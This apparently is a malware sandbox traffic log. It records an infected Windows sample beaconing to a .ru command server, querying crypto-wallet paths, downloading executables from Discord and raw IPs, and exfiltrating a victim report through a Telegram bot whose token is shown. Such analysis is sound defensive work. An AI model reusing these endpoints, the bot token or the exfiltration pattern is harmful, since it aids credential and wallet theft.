Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/146779096/943f13f9-3eb9-4042-8722-d95f026c8b09?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231118%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231118T090238Z&X-Amz-Expires=300&X-Amz-Signature=70af1f9a98f6f7decd9243215e43e906d5d375fed061f16f63b7782e965ba97c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=146779096&response-content-disposition=attachment%3B%20filename%3Dtor-expert-bundle-v0.4.5.10.zip&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dlls/x64/SQLite.Interop.dll HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //dd.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /?output=xml HTTP/1.1Host: ipwho.isConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //ferr.php?id=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /?output=xml HTTP/1.1Host: ipwho.isConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=btc HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=eth HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=xmr HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=xlm HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=xrp HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=ltc HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=14441&wallet=nec HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=bch HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=dash HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=steam HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //ready.php?id=4627883 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test HTTP/1.1Host: trecube.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getext?id=1 HTTP/1.1Host: trecube.com
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /getjson?id=1 HTTP/1.1Host: trecube.com
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /cinoshibot HTTP/1.1Host: t.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /?output=xml HTTP/1.1Host: ipwho.isConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=btc HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=eth HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=xmr HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=xlm HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=xrp HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=ltc HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=14441&wallet=nec HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=bch HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=dash HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /bot6786903508:AAEZrDI4W66M87X4qZRWEVE0zphCeKtMSXc/sendMessage?chat_id=6516807978&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E813848%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.14Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F52.86.18.77%3A8080%2Fget%2F3YxUsT%2F42asb_user%40813848_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F52.86.18.77%3A8080%2Fget%2F3YxUsT%2F42asb_user%40813848_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=steam HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /cinoshibot HTTP/1.1Host: t.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /traffico.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 194.49.94.145
Source: global traffic	HTTP traffic detected: GET /TrueCrypt_KlHkcF.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 194.49.94.120
Source: global traffic	HTTP traffic detected: GET /Chjirossjr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.196.9.161
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /brandrock.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 5.42.65.80
Source: global traffic	HTTP traffic detected: GET /1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 194.49.94.72
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /TrueCrypt_lDwnwJ.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 194.49.94.120
Source: global traffic	HTTP traffic detected: GET /cinoshibot HTTP/1.1Host: t.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /TrueCrypt_ypAWBs.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 194.49.94.120

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:02:23 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 8Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 04 00 00 00 2d 20 5c 6e Data Ascii: - \n
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:02:23 GMTServer: Apache/2.4.41 (Ubuntu)Keep-Alive: timeout=5, max=99Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 33 37 38 30 32 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 2b 3c 32 9d b1 fb 9e 1a 14 f1 c9 e9 21 0c f3 1a a3 04 13 3c ff 8f d7 e4 d3 68 7a 4d 8a a4 75 b4 33 d5 55 21 6f 40 51 f8 43 ab 46 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 a2 37 97 24 41 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 